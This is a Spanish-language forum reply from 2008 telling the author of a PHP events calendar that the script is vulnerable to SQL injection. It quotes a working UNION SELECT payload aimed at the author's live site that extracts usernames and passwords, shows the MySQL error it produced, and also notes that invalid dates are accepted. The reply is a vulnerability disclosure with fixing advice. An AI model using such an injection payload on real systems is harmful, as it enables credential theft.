04/08/2008, 06:59
|
 | | | Fecha de Ingreso: marzo-2008 Ubicación: Aqui estoy
Mensajes: 574
Antigüedad: 16 años, 10 meses Puntos: 20 | |
 Respuesta: Calendario con eventos listo !!!
Muy bueno, pero entra a este link:
http://www.mrad.com.ar/calendario/borrar.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(user,0x3a,pass),null,5,6/**/FROM/**/users/*&act=del
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION/**/ALL/**/SELECT/**/1,2,concat(user,0x3a,pass),null,5,6/**
te da un error sql.... osea que tu calendario es vulnerable a Inyecciones Sql ya que tu validacion solo valida las comillas y si te fijas esa inyeccion sql no tiene ninguna comilla.... jeje
te recomendaria que corrijas eso...
otra cosa que le encontre es que no valida la fecha, osea que pongo en fecha 2008-08-35 y me dice Evento Agregado... no me tira ningun error de fecha invalida...
Saludos..
__________________
Firma:
Es mas dificil para el mono entender que el hombre desciende de el....
PD: Siempre doy karma al que me da una buena respuesta... ;0) |